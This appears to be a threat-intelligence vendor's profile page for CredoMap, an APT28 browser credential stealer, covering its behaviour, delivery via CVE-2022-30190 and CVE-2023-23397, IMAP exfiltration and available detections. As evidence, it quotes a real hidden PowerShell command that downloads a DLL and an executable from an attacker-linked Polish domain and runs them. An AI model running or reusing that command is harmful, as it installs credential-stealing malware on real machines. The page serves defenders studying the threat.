CredoMap is a .NET browser-focused information stealer associated with the Russian state-linked espionage group APT28, also known as Fancy Bear and Sofacy. It has been used in operations targeting Ukraine during the Russia-Ukraine war and has also been referenced in broader APT28 intrusion activity against government entities, businesses, universities, research institutes, think tanks, and other strategic organizations in Europe.
Its primary function is theft of browser credentials and session material. CredoMap collects saved passwords and cookies from Chromium-based browsers including Google Chrome and Microsoft Edge, and also gathers cookies and credential-related artifacts from Mozilla Firefox. For Chromium browsers, it extracts and decrypts protected secrets using DPAPI-derived keys and AES-GCM where applicable, with fallback handling for older browser storage formats. For Firefox, it collects cookie stores and credential-supporting files for exfiltration. Reporting also indicates that APT28 likely reuses the stolen browser credentials and cookies for follow-on account compromise and longer-term access.
CredoMap has been delivered through phishing-driven infection chains, including weaponized documents exploiting Follina (CVE-2022-30190), as well as malicious archive-based lures impersonating trusted organizations. The malware has been observed exfiltrating stolen data through IMAP using compromised email accounts, and separate reporting ties APT28 CredoMap campaigns to HTTP-based exfiltration variants. Some assessments describe OCEANMAP as a more capable successor or evolution of CredoMap.
The malware is notable for direct collection-and-exfiltration behavior rather than reliance on durable persistence. It cleans up temporary artifacts after execution and can remove supporting files and self-delete, reflecting an operational preference for low-footprint credential theft in support of espionage objectives. CredoMap fits APT28’s broader shift toward lighter, disposable, credential-oriented tooling used alongside phishing, vulnerability exploitation, and abuse of email infrastructure.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actor weaponized a document to exploit the Follina (CVE-2022-30190) vulnerability that would result in downloading the .NET stealer. | CredoMap is a stealer developed by the Russian APT28/Sofacy/Fancy Bear that was used to target users in Ukraine in the context of the ongoing war between Russia and Ukraine.
The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. | The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
2022-09-27 ⋅ SecurityScorecard ⋅ A Deep Dive Into the APT28’s stealer called CredoMap
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Recorded Future revealed details of a spear-phishing campaign orchestrated by APT28 exploiting multiple vulnerabilities in the open-source Roundcube webmail software... The National Cybersecurity Agency of France (ANSSI) ... blamed the hacking outfit for targeting government entities ... by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.
cmd.exe /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command '& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}'
The implementation of the deletion function consists of creating a cmd.exe process that deletes the DLL file shown above... Processes spawned cmd.exe “/C Del <Files>”
... son implant CredoMap, qui permet de collecter des identifiants et des cookies de navigateurs ... [T1555.003, T1539]
The data exfiltration is done by sending information to a possibly compromised C2 server via the IMAP email protocol.
18 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
APT28 stealer used in cyberattacks and credential theft operations.
A browser credential stealer used as one component in APT28's disposable modular toolkit.
A .NET information stealer used by APT28 to steal browser credentials and cookies from Google Chrome, Mozilla Firefox, and Microsoft Edge, then exfiltrate the data to a C2 server over IMAP.
A previously identified backdoor used by APT28 and referenced here as the predecessor to OCEANMAP.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.